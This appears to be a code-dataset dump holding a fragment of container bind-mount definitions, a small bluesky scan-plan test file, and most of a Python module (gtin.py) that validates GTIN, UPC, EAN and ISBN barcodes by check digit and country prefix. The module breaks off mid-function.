MOUNT_DBUS = Mount(
type=MountType.BIND.value, source="/run/dbus", target="/run/dbus", read_only=True
)
MOUNT_DEV = Mount(
type=MountType.BIND.value, source="/dev", target="/dev", read_only=True
)
MOUNT_DOCKER = Mount(
type=MountType.BIND.value,
source="/run/docker.sock",
target="/run/docker.sock",
read_only=True,
)
MOUNT_MACHINE_ID = Mount(
type=MountType.BIND.value,
source=MACHINE_ID.as_posix(),
target=MACHINE_ID.as_posix(),
read_only=True,
)
MOUNT_UDEV = Mount(
type=MountType.BIND.value, source="/run/udev", target="/run/udev", read_only=True
)
| [
"[email protected]"
] | |
a90e9370b12a22d95dfd74afb1de671b312d4041 | 6471f95e6a193b0c018d81a2c4e8a518f7ec35d7 | /tests/test_wrappers.py | 04a0837a4d619f644b026ee4c60fc82aa4fe1eee | [
"BSD-3-Clause"
] | permissive | Billingegroup/bluesky_scanplans | 5b297e4874b2e57d44a5cc091a2a87be87856503 | f865da9712bb91dceee73d4aea61f9b6c4b2c9ef | refs/heads/master | 2021-06-30T18:08:37.553268 | 2021-05-20T18:25:31 | 2021-05-20T18:25:31 | 234,350,238 | 0 | 3 | BSD-3-Clause | 2021-05-20T17:11:51 | 2020-01-16T15:27:35 | Jupyter Notebook | UTF-8 | Python | false | false | 755 | py | import bluesky.plan_stubs as bps
import bluesky.plans as bp
import bluesky.simulators as sim
import xpdsim.movers as movers
import scanplans.wrapper as helper
def test_wrapper_count():
trigger_and_read = helper.shutter_wrapper(bps.trigger_and_read, movers.shctl1, 0, 100, 0)
one_shot = helper.take_reading_wrapper(bps.one_shot, trigger_and_read)
plan = bp.count([movers.cs700], per_shot=one_shot)
sim.summarize_plan(plan)
def test_grid_scan():
trigger_and_read = helper.shutter_wrapper(bps.trigger_and_read, movers.shctl1, 0, 100, 0)
one_nd_step = helper.take_reading_wrapper(bps.one_nd_step, trigger_and_read)
plan = bp.grid_scan([movers.cs700], movers.cs700, -1, 1, 3, per_step=one_nd_step)
sim.summarize_plan(plan)
| [
"[email protected]"
] | |
130afc27743998b2f8782f773138e810728f701f | 680371c067ae3bbab958d6224b405630eaef8e31 | /python_BTL_BitTorrent-5.3-GPL/BTL/canonical/gtin.py | c43182a6c08aae0b0bcd64cbecb1cc71e2c07253 | [
"MIT"
] | permissive | galaxy001/libtorrent | 18ede4a2e1c610089a082683ec4b33da0625837a | 6a17e8ebfb668a8965fbf8a53083ec7bd4339847 | refs/heads/master | 2021-01-10T11:13:44.730732 | 2017-08-26T19:58:08 | 2017-08-26T19:58:08 | 48,836,473 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 90,803 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
This is a Python module for handling Global Trade Item Numbers (GTINs)
and includes check digit verification and structural verification (has
to look like a GTIN). GTIN is a superset of the older UPC/UCC-12
(12-digit), EAN/UCC-8 (8-digit) and EAN-13/UCC-13 (13-digit) codes,
and consists of fourteen digits, zero-filled on the left. The final
digit is a check digit. They are sometimes written out in full in
EAN/UCC/ITF-14 form, optionally with an auxiliary quantity code as a
second UPC-style code.
This module also handles UPC E/UPC-8 8-digit zero-suppressed
identifiers; use GTIN_from_UPC8 to decompress these and GTIN_to_UPC8
to produce them, or use the UPC8 class.
This module also handles 10- and 13-digit International Standard Book
Numbers (ISBN-10 and ISBN-13 respectively, collectively ISBNs) and the
older 9-digit Standard Book Numbers (SBNs); use GTIN_from_ISBN to
decode these and GTIN_to_ISBN to produce them, or use the ISBN class.
This module also handles 10- and 13-digit International Standard Music
Numbers (ISMNs); use GTIN_from_ISMN to decode these and GTIN_to_ISMN
to produce them, or use the ISMN class.
This module also handles 8-digit International Standard Serial Numbers
(ISSNs); use GTIN_from_ISSN to decode these and GTIN_to_ISSN to
produce them, or use the ISSN class.
This module does not calculate UPC/UCC-12 price check digits, nor does
it handle auxiliary bar codes for quantities, issue numbers (ISSN) or
other purposes.
The same check digit algorithm used for GTIN (checkStandardModulo) is
also used for 18-digit Serial Shipping Container Codes (SSCCs),
17-digit Shipment ID/Bill of Lading numbers (BoLs), 10-digit
International Standard Music Numbers (ISMNs), and 13-digit Global
Location Numbers (GLNs).
The same check character algorithm used for ISBN (checkPositionModulo)
is also used for 8-digit International Standard Serial Numbers
(ISSNs).
NOTE: EAN.UCC is now known as GS1
FIXME: The Serial Item and Contribution Identifier (SICI) code,
ANSI/NISO Z39.56, and corresponding SISAC barcode format are not yet
handled by this module; they embed ISSN data but also include the year
and month of publication, and the issue number.
FIXME: This module does not handle the more advanced UCC/EAN-128
structure which encodes one or more pieces of typed numeric or
alphanumeric information.
FIXME: This module does not handle Global Location Numbers (GLNs) or
the older EAN Location Numbers; these are however structurally
identical to GTIN and so the same code works for both (note that in
practice the same number means different things depending on whether
it is used in a GTIN context or in a GLN context, but these contexts
are clearly distinguished.)
FIXME: NOTE THAT THE THIRTEEN-DIGIT ISMN AND THE CORRESPONDING 979-0
"MUSICLAND" PREFIX MAY NOT YET BE STANDARDIZED AS OF THIS WRITING.
'''
import re
import sys
import string
import time
def checkStandardModulo(base, digits, scale = 3):
'''
Return the standard modulo-BASE check digit integer for the given
integer sequence ("digits") where every other digit is multiplied
by the scale factor (three by default) while summing, and the
check digit is the complement of the modulo-BASE sum.
'''
isum = 0
for x in xrange(1, len(digits) + 1):
isum = (isum + ((x % 2) and scale or 1) * digits[-x]) % base
pass
return (base - isum) % base
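# For instance (standard EAN-13 test value, shown here as a sketch):
#   checkStandardModulo(10, [4, 0, 0, 6, 3, 8, 1, 3, 3, 3, 9, 3]) == 1
# which matches the published check digit of EAN-13 4006381333931.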
def checkPositionModulo(base, digits):
'''
Return the position-scaled modulo-BASE check digit integer for the
given integer sequence ("digits") where each digit is multiplied
by its position plus one, and the check-digit is the complement of
the modulo-BASE sum.
Note that rightmost digit in the sequence is multiplied by two,
the next to the left by three, etc.
'''
isum = 0
for x in xrange(1, len(digits) + 1):
isum += ((x + 1) * digits[-x]) % base
pass
return (base - isum) % base
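# For instance (classic ISBN-10 example, shown here as a sketch): for
# ISBN 0-306-40615-2 the first nine digits give
#   checkPositionModulo(11, [0, 3, 0, 6, 4, 0, 6, 1, 5]) == 2
# matching the printed check digit.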
class GTIN(object):
'''
Global Trade Item Numbers (GTIN)
Structure: 14 decimal digits with the last digit serving as a
check digit.
Valid GTIN formats (leading zeroes may be omitted on input):
UPC/UCC-12:
00hhhhhhiiiiic
00hhhhhhhiiiic
00hhhhhhhhiiic
00hhhhhhhhhiic
EAN/UCC-13:
0nnnnnnnnnnnnc
EAN/UCC-14:
pnnnnnnnnnnnnc
EAN/UCC-8:
000000nnnnnnnc
Key: p - indicator digit (used e.g. in layered packaging)
h - UCC company prefix
i - item reference number
n - EAN/UCC company prefix and reference number
c - check digit
NOTE: EAN/UCC-8 is for use only outside the US and Canada, and is
not to be confused with 8-digit UPC E/UPC-8, which is a compressed
representation for UPC/UCC-12.
NOTE: 8-digit UPC E/UPC-8 codes should be converted to UPC/UCC-12
(UPC A) format before zero-filling and use as GTINs.
The check digits are calculated by the standard modulo algorithm
where every other digit is tripled while summing.
NOTE: GTINs in the invalid/unassigned Bookland (ISBN) range
p9786nnnnnnnnc are disallowed by this code and raise
a ValueError.
'''
# FIXME: we permit non-zero-filled forms.
gtin_re = re.compile(
r'''
\A
(?:
(?:
(?:
(?:
(?:EAN|UPC|U[.]P[.]C[.]|(?:EAN[-./]?)UCC)
(?:[- ]?12)?
|
(?:UPC|U[.]P[.]C[.])[ ]?A
)
:?
[ ]?
)?
(?P<upc>\d{11})
)
|
(?:
(?:
(?:EAN|JAN|IAN|DUN|(?:EAN[-./]?)UCC)
(?:[- ]?13)?
:?
[ ]?
)?
(?P<ean>\d{12})
)
|
(?:
(?:
(?:EAN|ITF|(?:EAN[-./]?)UCC)
(?:[- ]?14)?
:?
[ ]?
)?
(?P<gtin>\d{13})
)
|
(?:
(?:
(?:EAN|(?:EAN[-./]?)UCC)
(?:[- ]?8)?
:?
[ ]?
)?
(?P<ean8>\d{7})
)
)
(?P<gtincheck>\d)
\Z
''',
re.VERBOSE | re.UNICODE | re.IGNORECASE)
# longest match wins
systemcodes = {
## FIXME: is this really always correct? Need to check UCC registration info...
'00': 'USA & Canada',
'00000': 'EAN/UCC-8',
'000000': 'reserved for internal use',
'000002': 'reserved for internal use',
'0001': 'reserved for internal use',
'0002': 'reserved for internal use',
'0003': 'reserved for internal use',
'0004': 'reserved for internal use',
'0005': 'reserved for internal use',
'0006': 'reserved for internal use',
'0007': 'reserved for internal use',
'01': 'USA & Canada (formerly reserved)',
'02': 'reserved for local use (store/warehouse); typically used for random-weight items',
'03': 'USA & Canada (pharmaceuticals)',
'04': 'reserved for local use (store/warehouse); typically used by retailers for in-store marking',
'05': 'Coupons',
'06': 'USA & Canada',
'07': 'USA & Canada',
'08': 'USA & Canada (formerly reserved)',
'09': 'USA & Canada (formerly reserved)',
'10': 'USA & Canada',
'11': 'USA & Canada',
'12': 'USA & Canada',
'13': 'USA & Canada',
'14': 'reserved (?)',
'15': 'reserved (?)',
'16': 'reserved (?)',
'17': 'reserved (?)',
'18': 'reserved (?)',
'19': 'reserved (?)',
'2': 'reserved for local use (store/warehouse)',
'30': 'France',
'31': 'France',
'32': 'France',
'33': 'France',
'34': 'France',
'35': 'France',
'36': 'France',
'37': 'France',
'380': 'Bulgaria',
'383': 'Slovenija',
'385': 'Croatia',
'387': 'BIH (Bosnia-Herzegovina)',
'40': 'Germany',
'41': 'Germany',
'42': 'Germany',
'43': 'Germany',
'440': 'Germany',
'45': 'Japan',
'46': 'Russian Federation',
'470': 'Kyrgyzstan',
'471': 'Taiwan',
'474': 'Estonia',
'475': 'Latvia',
'476': 'Azerbaijan',
'477': 'Lithuania',
'478': 'Uzbekistan',
'479': 'Sri Lanka',
'480': 'Philippines',
'481': 'Belarus',
'482': 'Ukraine',
'484': 'Moldova',
'485': 'Armenia',
'486': 'Georgia',
'487': 'Kazakhstan',
'489': 'Hong Kong',
'49': 'Japan',
'50': 'UK',
'520': 'Greece',
'528': 'Lebanon',
'529': 'Cyprus',
'531': 'Macedonia',
'535': 'Malta',
'539': 'Ireland',
'54': 'Belgium & Luxembourg',
'560': 'Portugal',
'569': 'Iceland',
'57': 'Denmark',
'590': 'Poland',
'594': 'Romania',
'599': 'Hungary',
'600': 'South Africa',
'601': 'South Africa',
'608': 'Bahrain',
'609': 'Mauritius',
'611': 'Morocco',
'613': 'Algeria',
'619': 'Tunisia',
'621': 'Syria',
'622': 'Egypt',
'624': 'Libya',
'625': 'Jordan',
'626': 'Iran',
'627': 'Kuwait',
'628': 'Saudi Arabia',
'629': 'Emirates',
'64': 'Finland',
'690': 'China',
'691': 'China',
'692': 'China',
'693': 'China',
'694': 'China',
'695': 'China',
'70': 'Norway',
'729': 'Israel',
'73': 'Sweden',
'740': 'Guatemala',
'741': 'El Salvador',
'742': 'Honduras',
'744': 'Costa Rica',
'745': 'Panama',
'746': 'Republica Dominicana',
'750': 'Mexico',
'754': 'Canada',
'755': 'Canada',
'759': 'Venezuela',
'76': 'Schweiz, Suisse, Svizzera',
'770': 'Colombia',
'773': 'Uruguay',
'775': 'Peru',
'777': 'Bolivia',
'779': 'Argentina',
'780': 'Chile',
'784': 'Paraguay',
'786': 'Ecuador',
'789': 'Brasil',
'790': 'Brasil',
'80': 'Italy',
'81': 'Italy',
'82': 'Italy',
'83': 'Italy',
'84': 'Spain',
'850': 'Cuba',
'858': 'Slovakia',
'859': 'Czech',
'860': 'YU (Serbia & Montenegro)',
'865': 'Mongolia',
'867': 'North Korea',
'869': 'Turkey',
'87': 'Netherlands',
'880': 'South Korea',
'884': 'Cambodia',
'885': 'Thailand',
'888': 'Singapore',
'890': 'India',
'893': 'Vietnam',
'899': 'Indonesia',
'90': 'Austria',
'91': 'Austria',
'93': 'Australia',
'94': 'New Zealand',
'950': 'Head Office',
'955': 'Malaysia',
'958': 'Macau',
'970': 'reserved (?)',
'971': 'reserved (?)',
'972': 'reserved (?)',
'973': 'reserved (?)',
'974': 'reserved (?)',
'975': 'reserved (?)',
'976': 'reserved (?)',
'977': 'Serial publications (ISSN)',
'978': 'Bookland (ISBN)',
'9780': 'Bookland (ISBN): English speaking area: Australia, Canada (E.), Gibraltar, Ireland, (Namibia), New Zealand, Puerto Rico, South Africa, Swaziland, UK, USA, Zimbabwe',
'9781': 'Bookland (ISBN): English speaking area: Australia, Canada (E.), Gibraltar, Ireland, (Namibia), New Zealand, Puerto Rico, South Africa, Swaziland, UK, USA, Zimbabwe',
'9782': 'Bookland (ISBN): French speaking area: France, Belgium (Fr. sp.), Canada (Fr. sp.), Luxembourg, Switzerland (Fr. sp.)',
'9783': 'Bookland (ISBN): German speaking area: Austria, Germany, Switzerland (Germ. sp.)',
'9784': 'Bookland (ISBN): Japan',
'9785': 'Bookland (ISBN): Russian Federation (Azerbaijan, Tajikistan, Turkmenistan, Uzbekistan, Armenia, Belarus, Estonia, Georgia, Kazakhstan, Kyrgyzstan, Latvia, Lithuania, Moldova, Ukraine)',
'9786': 'Bookland (ISBN): UNDEFINED/INVALID',
'9787': 'Bookland (ISBN): China, People\'s Republic',
'97880': 'Bookland (ISBN): Czech Republic; Slovakia',
'97881': 'Bookland (ISBN): India',
'97882': 'Bookland (ISBN): Norway',
'97883': 'Bookland (ISBN): Poland',
'97884': 'Bookland (ISBN): Spain',
'97885': 'Bookland (ISBN): Brazil',
'97886': 'Bookland (ISBN): Serbia and Montenegro: Bosnia and Herzegovina, Croatia, Macedonia, Slovenia',
'97887': 'Bookland (ISBN): Denmark',
'97888': 'Bookland (ISBN): Italian speaking area: Italy, Switzerland (It. sp.)',
'97889': 'Bookland (ISBN): Korea',
'97890': 'Bookland (ISBN): Netherlands: Netherlands, Belgium (Flemish)',
'97891': 'Bookland (ISBN): Sweden',
'97892': 'Bookland (ISBN): International Publishers (Unesco, EU); European Community Organizations',
'97893': 'Bookland (ISBN): India',
'978950': 'Bookland (ISBN): Argentina',
'978951': 'Bookland (ISBN): Finland',
'978952': 'Bookland (ISBN): Finland',
'978953': 'Bookland (ISBN): Croatia',
'978954': 'Bookland (ISBN): Bulgaria',
'978955': 'Bookland (ISBN): Sri Lanka',
'978956': 'Bookland (ISBN): Chile',
'978957': 'Bookland (ISBN): Taiwan, China',
'978958': 'Bookland (ISBN): Colombia',
'978959': 'Bookland (ISBN): Cuba',
'978960': 'Bookland (ISBN): Greece',
'978961': 'Bookland (ISBN): Slovenia',
'978962': 'Bookland (ISBN): Hong Kong',
'978963': 'Bookland (ISBN): Hungary',
'978964': 'Bookland (ISBN): Iran',
'978965': 'Bookland (ISBN): Israel',
'978966': 'Bookland (ISBN): Ukraine',
'978967': 'Bookland (ISBN): Malaysia',
'978968': 'Bookland (ISBN): Mexico',
'978969': 'Bookland (ISBN): Pakistan',
'978970': 'Bookland (ISBN): Mexico',
'978971': 'Bookland (ISBN): Philippines',
'978972': 'Bookland (ISBN): Portugal',
'978973': 'Bookland (ISBN): Romania',
'978974': 'Bookland (ISBN): Thailand',
'978975': 'Bookland (ISBN): Turkey',
'978976': 'Bookland (ISBN): Caribbean Community: Antigua [AG], Bahamas [BS], Barbados [BB], Belize [BZ], Cayman Islands [KY], Dominica [DM], Grenada [GD], Guyana [GY], Jamaica [JM], Montserrat [MS], St. Kitts-Nevis [KN], St. Lucia [LC], St. Vincent and the Grenadines [VC], Trinidad and Tobago [TT], Virgin Islands (Br) [VG]',
'978977': 'Bookland (ISBN): Egypt',
'978978': 'Bookland (ISBN): Nigeria',
'978979': 'Bookland (ISBN): Indonesia',
'978980': 'Bookland (ISBN): Venezuela',
'978981': 'Bookland (ISBN): Singapore',
'978982': 'Bookland (ISBN): South Pacific: Cook Islands [CK], Fiji [FJ], Kiribati [KI], Marshall Islands [MH], Micronesia (Federal States of) [FM], Nauru [NR], New Caledonia [NC], Niue [NU], Palau [PW], Solomon Islands [SB], Tokelau [TK], Tonga [TO], Tuvalu [TV], Vanuatu [VU], Western Samoa [WS]',
'978983': 'Bookland (ISBN): Malaysia',
'978984': 'Bookland (ISBN): Bangladesh',
'978985': 'Bookland (ISBN): Belarus',
'978986': 'Bookland (ISBN): Taiwan, China',
'978987': 'Bookland (ISBN): Argentina',
'978988': 'Bookland (ISBN): Hong Kong',
'978989': 'Bookland (ISBN): Portugal',
'9789944': 'Bookland (ISBN): Turkey',
'9789945': 'Bookland (ISBN): Dominican Republic',
'9789946': 'Bookland (ISBN): Korea, P.D.R.',
'9789947': 'Bookland (ISBN): Algeria',
'9789948': 'Bookland (ISBN): United Arab Emirates',
'9789949': 'Bookland (ISBN): Estonia',
'9789950': 'Bookland (ISBN): Palestine',
'9789951': 'Bookland (ISBN): Kosova',
'9789952': 'Bookland (ISBN): Azerbaijan',
'9789953': 'Bookland (ISBN): Lebanon',
'9789954': 'Bookland (ISBN): Morocco',
'9789955': 'Bookland (ISBN): Lithuania',
'9789956': 'Bookland (ISBN): Cameroon',
'9789957': 'Bookland (ISBN): Jordan',
'9789958': 'Bookland (ISBN): Bosnia and Herzegovina',
'9789959': 'Bookland (ISBN): Libya',
'9789960': 'Bookland (ISBN): Saudi Arabia',
'9789961': 'Bookland (ISBN): Algeria',
'9789962': 'Bookland (ISBN): Panama',
'9789963': 'Bookland (ISBN): Cyprus',
'9789964': 'Bookland (ISBN): Ghana',
'9789965': 'Bookland (ISBN): Kazakhstan',
'9789966': 'Bookland (ISBN): Kenya',
'9789967': 'Bookland (ISBN): Kyrgyzstan',
'9789968': 'Bookland (ISBN): Costa Rica',
'9789970': 'Bookland (ISBN): Uganda',
'9789971': 'Bookland (ISBN): Singapore',
'9789972': 'Bookland (ISBN): Peru',
'9789973': 'Bookland (ISBN): Tunisia',
'9789974': 'Bookland (ISBN): Uruguay',
'9789975': 'Bookland (ISBN): Moldova',
'9789976': 'Bookland (ISBN): Tanzania',
'9789977': 'Bookland (ISBN): Costa Rica',
'9789978': 'Bookland (ISBN): Ecuador',
'9789979': 'Bookland (ISBN): Iceland',
'9789980': 'Bookland (ISBN): Papua New Guinea',
'9789981': 'Bookland (ISBN): Morocco',
'9789982': 'Bookland (ISBN): Zambia',
'9789983': 'Bookland (ISBN): Gambia',
'9789984': 'Bookland (ISBN): Latvia',
'9789985': 'Bookland (ISBN): Estonia',
'9789986': 'Bookland (ISBN): Lithuania',
'9789987': 'Bookland (ISBN): Tanzania',
'9789988': 'Bookland (ISBN): Ghana',
'9789989': 'Bookland (ISBN): Macedonia',
'97899901': 'Bookland (ISBN): Bahrain',
'97899902': 'Bookland (ISBN): Gabon',
'97899903': 'Bookland (ISBN): Mauritius',
'97899904': 'Bookland (ISBN): Netherlands Antilles; Aruba, Neth. Ant.',
'97899905': 'Bookland (ISBN): Bolivia',
'97899906': 'Bookland (ISBN): Kuwait',
'97899908': 'Bookland (ISBN): Malawi',
'97899909': 'Bookland (ISBN): Malta',
'97899910': 'Bookland (ISBN): Sierra Leone',
'97899911': 'Bookland (ISBN): Lesotho',
'97899912': 'Bookland (ISBN): Botswana',
'97899913': 'Bookland (ISBN): Andorra',
'97899914': 'Bookland (ISBN): Suriname',
'97899915': 'Bookland (ISBN): Maldives',
'97899916': 'Bookland (ISBN): Namibia',
'97899917': 'Bookland (ISBN): Brunei Darussalam',
'97899918': 'Bookland (ISBN): Faroe Islands',
'97899919': 'Bookland (ISBN): Benin',
'97899920': 'Bookland (ISBN): Andorra',
'97899921': 'Bookland (ISBN): Qatar',
'97899922': 'Bookland (ISBN): Guatemala',
'97899923': 'Bookland (ISBN): El Salvador',
'97899924': 'Bookland (ISBN): Nicaragua',
'97899925': 'Bookland (ISBN): Paraguay',
'97899926': 'Bookland (ISBN): Honduras',
'97899927': 'Bookland (ISBN): Albania',
'97899928': 'Bookland (ISBN): Georgia',
'97899929': 'Bookland (ISBN): Mongolia',
'97899930': 'Bookland (ISBN): Armenia',
'97899931': 'Bookland (ISBN): Seychelles',
'97899932': 'Bookland (ISBN): Malta',
'97899933': 'Bookland (ISBN): Nepal',
'97899934': 'Bookland (ISBN): Dominican Republic',
'97899935': 'Bookland (ISBN): Haiti',
'97899936': 'Bookland (ISBN): Bhutan',
'97899937': 'Bookland (ISBN): Macau',
'97899938': 'Bookland (ISBN): Srpska',
'97899939': 'Bookland (ISBN): Guatemala',
'97899940': 'Bookland (ISBN): Georgia',
'97899941': 'Bookland (ISBN): Armenia',
'97899942': 'Bookland (ISBN): Sudan',
'97899943': 'Bookland (ISBN): Albania',
'97899944': 'Bookland (ISBN): Ethiopia',
'97899945': 'Bookland (ISBN): Namibia',
'97899946': 'Bookland (ISBN): Nepal',
'97899947': 'Bookland (ISBN): Tajikistan',
'97899948': 'Bookland (ISBN): Eritrea',
'97899949': 'Bookland (ISBN): Mauritius',
'97899950': 'Bookland (ISBN): Cambodia',
'97899951': 'Bookland (ISBN): Congo',
'97899952': 'Bookland (ISBN): Mali',
'97899953': 'Bookland (ISBN): Paraguay',
'979': 'Bookland (ISBN)',
'9790': 'Musicland (ISMN)',
'980': 'Refund receipts',
'981': 'Common Currency Coupons',
'982': 'Common Currency Coupons',
'99': 'Coupons',
}
packcodes = {
'0': None,
'1': 'conventionally more than individual and less than inner pack (primary code)',
'2': 'conventionally more than individual and less than inner pack (alternate code)',
'3': 'conventionally an inner pack (primary code)',
'4': 'conventionally an inner pack (alternate code)',
'5': 'conventionally a shipping container or carton (primary code)',
'6': 'conventionally a shipping container or carton (alternate code)',
'7': 'conventionally a shipping pallet',
'8': 'code reserved for future use',
'9': 'variable quantity content',
}
def __init__(self, s, public = True, autocorrect = False):
'''
Initialize a GTIN from a string ("s"); set the optional flag
public = False if this GTIN is being used in an internal
context where local use codes are allowed. Set the optional
flag autocorrect = True to replace the supplied check digit
with the correct one rather than raising an exception when the
check digit is not valid.
Canonical forms (input and output):
xxxxxxxxxxxxxy
Short forms (input only):
xxxxxxxxxxxy
xxxxxxxxxxxxy
xxxxxxxy
Where x is a decimal digit and y is a decimal check
digit. Whitespace and hyphens are stripped on input.
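Example (illustrative; values mirror the self-tests in test()):
>>> str(GTIN('614141210220'))
'00614141210220'
>>> str(GTIN('0 48500 00102 8'))
'00048500001028'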
'''
if isinstance(s, GTIN): s = GTIN.__str__(s, short = True)
self.public = public
match = self.gtin_re.match(''.join(''.join(str(s).split()).split('-')))
if not match: raise ValueError('invalid literal for %s.%s(): %r' % (GTIN.__module__, GTIN.__name__, s))
self.gtin = (match.group('gtin') or match.group('ean') or match.group('upc') or match.group('ean8')).zfill(13)
self.gtincheck = match.group('gtincheck')
self.check(autocorrect = autocorrect)
self.info = None
self.pack = self.packcodes[self.gtin[0]]
if self.gtin[0] == '8':
raise ValueError('invalid literal for %s.%s(): %r (%s)' % (GTIN.__module__, GTIN.__name__, s, self.pack))
for i in xrange(1, len(self.gtin)):
key = self.gtin[1:][:-i]
if key == '9786':
raise ValueError('invalid literal for %s.%s(): %r (Bookland/ISBN reserved range)' % (GTIN.__module__, GTIN.__name__, s))
if self.systemcodes.has_key(key):
self.info = self.systemcodes[key]
break
if key[:5] == '00000' and self.systemcodes.has_key(key[5:]):
self.info = self.systemcodes[key[5:]]
break
pass
return
def __cmp__(self, gtin):
'''
Compare this GTIN with another object, returning -1 if the
other is greater than this one, 0 if the other is equal to
this one, or 1 if the other is less than this one.
'''
if not isinstance(gtin, GTIN):
raise TypeError('%s.%s.__cmp__(self, gtin) requires gtin to be a %s.%s, not a %s.%s' % (GTIN.__module__, GTIN.__name__, GTIN.__module__, GTIN.__name__, type(gtin).__module__, type(gtin).__name__))
return cmp(GTIN.__str__(self), GTIN.__str__(gtin))
def check(self, autocorrect = False):
'''
Verify the GTIN check digit. If it does not match, this raises
a ValueError. The optional parameter autocorrect = True
instead silently fixes the check digit.
Also verifies that a non-public GTIN is not used in a public context.
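Example (illustrative; mirrors the autocorrect self-test):
>>> GTIN('43210122', autocorrect = True) == GTIN('00000043210121')
True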
'''
digits = self.gtin
checkdigit = checkStandardModulo(10, [ int(ch, 10) for ch in digits ])
if autocorrect: self.gtincheck = str(checkdigit)
if int(self.gtincheck, 10) != checkdigit:
raise ValueError('invalid check digit for GTIN %s: %s' % (self, self.gtincheck))
# private codes (both EAN-8 and regular variants): restricted
# distribution, coupons, refund receipts, common currency
# coupons, packs thereof, and reserved ranges
if ((self.gtin[1:9] in ('00000970', '00000971', '00000972', '00000973', '00000974', '00000975', '00000976')
or self.gtin[1:8] in ('0000098', '0000099')
or self.gtin[1:7] in ('000000', '000002')
or self.gtin[1:5] in ('0001', '0002', '0003', '0004', '0005', '0006', '0007')
or self.gtin[1:4] in ('970', '971', '972', '973', '974', '975', '976')
or self.gtin[1:3] in ('02', '04', '05', '98', '99')
or self.gtin[1:2] in ('2',)
)
and self.public):
raise ValueError('non-public code in a public context for %s' % self)
pass
def __repr__(self): return '%s.%s(%r%s)' % (self.__class__.__module__, self.__class__.__name__, str(self), (not self.public) and ', public = False' or '')
def __str__(self, short = False):
'''
Stringify a GTIN; the optional flag short = True currently has no effect
'''
o = []
o.append(self.gtin)
o.append(self.gtincheck)
return ''.join(o)
pass
class EAN14(GTIN):
'''
Handle EAN/UCC-14 as a wrapper class around GTIN
'''
def __init__(self, s, **kw):
if not isinstance(s, GTIN):
match = self.gtin_re.match(''.join(''.join(str(s).split()).split('-')))
if not match or not match.group('gtin'): raise ValueError('invalid literal for %s.%s(): %r' % (EAN14.__module__, EAN14.__name__, s))
pass
GTIN.__init__(self, s, **kw)
pass
def __str__(self, short = False):
'''
Stringify an EAN/UCC-14; the optional flag short = True omits the EAN prefix
'''
o = []
if not short: o.append('EAN ')
o.append(self.gtin)
o.append(self.gtincheck)
return ''.join(o)
pass
class EAN13(GTIN):
'''
Handle EAN/JAN/IAN/DUN/EAN.UCC-13 as a wrapper class around GTIN
'''
def __init__(self, s, **kw):
if not isinstance(s, GTIN):
match = self.gtin_re.match(''.join(''.join(str(s).split()).split('-')))
if not match or not match.group('ean'): raise ValueError('invalid literal for %s.%s(): %r' % (EAN13.__module__, EAN13.__name__, s))
pass
GTIN.__init__(self, s, **kw)
if self.gtin[0] != '0':
raise ValueError('invalid literal for %s.%s(): %s' % (EAN13.__module__, EAN13.__name__, s))
pass
def __str__(self, short = False):
'''
Stringify an EAN/JAN/IAN/DUN/EAN.UCC-13; the optional flag short = True omits the EAN prefix
'''
o = []
if not short: o.append('EAN ')
o.append(self.gtin[1:])
o.append(self.gtincheck)
return ''.join(o)
pass
class UPC12(GTIN):
'''
Handle UPC A/EAN/UPC/EAN.UCC-12 as a wrapper class around GTIN
Not handled yet: price decoding for variable-quantity goods, e.g.
209060 301694
tare 0.010lb
net wt. 2.450lb
price/lb. $0.69/lb
total price $1.69
'''
def __init__(self, s, **kw):
if not isinstance(s, GTIN):
match = self.gtin_re.match(''.join(''.join(str(s).split()).split('-')))
if not match or not match.group('upc'): raise ValueError('invalid literal for %s.%s(): %r' % (UPC12.__module__, UPC12.__name__, s))
pass
GTIN.__init__(self, s, **kw)
if self.gtin[:2] != '00':
raise ValueError('invalid literal for %s.%s(): %s' % (UPC12.__module__, UPC12.__name__, s))
pass
def __str__(self, short = False):
'''
Stringify a UPC A/EAN/UPC/EAN.UCC-12; the optional flag short = True omits the UPC prefix
'''
o = []
if not short: o.append('UPC ')
o.append(self.gtin[2:])
o.append(self.gtincheck)
return ''.join(o)
pass
class EAN8(GTIN):
'''
Handle EAN-8 as a wrapper class around GTIN
'''
def __init__(self, s, **kw):
if not isinstance(s, GTIN):
match = self.gtin_re.match(''.join(''.join(str(s).split()).split('-')))
if not match or not match.group('ean8'): raise ValueError('invalid literal for %s.%s(): %r' % (EAN8.__module__, EAN8.__name__, s))
pass
GTIN.__init__(self, s, **kw)
if self.gtin[:6] != '000000':
raise ValueError('invalid literal for %s.%s(): %s' % (EAN8.__module__, EAN8.__name__, s))
pass
def __str__(self, short = False):
'''
Stringify an EAN-8; the optional flag short = True omits the EAN prefix
'''
o = []
if not short: o.append('EAN ')
o.append(self.gtin[6:])
o.append(self.gtincheck)
return ''.join(o)
pass
upc8_re = re.compile(
r'''
\A
(?:
(?:UPC|U[.]P[.]C[.])(?:[- ]?[8E])?:?
[ ]?
)?
(?P<upc8>0\d{6,6})
(?P<upc8check>\d)
\Z
''',
re.VERBOSE | re.UNICODE | re.IGNORECASE)
def GTIN_from_UPC8(s, **kw):
'''
Return a GTIN object based on a UPC E/UPC-8 string.
Whitespace and hyphens are ignored on input.
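Example (illustrative; mirrors the self-tests):
>>> GTIN_from_UPC8('01987913') == GTIN('00019100008793')
True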
'''
if isinstance(s, GTIN): s = GTIN_to_UPC8(s)
match = upc8_re.match(''.join(''.join(str(s).split()).split('-')))
if not match: raise ValueError('invalid literal for %s.%s(): %r' % (GTIN_from_UPC8.__module__, GTIN_from_UPC8.__name__, s))
upc8, upccheck = match.group('upc8'), match.group('upc8check')
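# Zero-suppression expansion (summary of the branches below), with
# upc8 = '0' d1 d2 d3 d4 d5 d6:
#   d6 in 0-2: manufacturer d1 d2 d6 0 0, item 0 0 d3 d4 d5
#   d6 == 3:   manufacturer d1 d2 d3 0 0, item 0 0 0 d4 d5
#   d6 == 4:   manufacturer d1 d2 d3 d4 0, item 0 0 0 0 d5
#   d6 in 5-9: manufacturer d1 d2 d3 d4 d5, item 0 0 0 0 d6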
if upc8[-1] in '012': upc = upc8[:3] + upc8[-1] + '0000' + upc8[3:6]
elif upc8[-1] == '3': upc = upc8[:4] + '00000' + upc8[4:6]
elif upc8[-1] == '4': upc = upc8[:5] + '00000' + upc8[5:6]
else: upc = upc8[:6] + '0000' + upc8[6:]
return GTIN(upc + upccheck, **kw)
def GTIN_to_UPC8(gtin, short = False, **kw):
'''
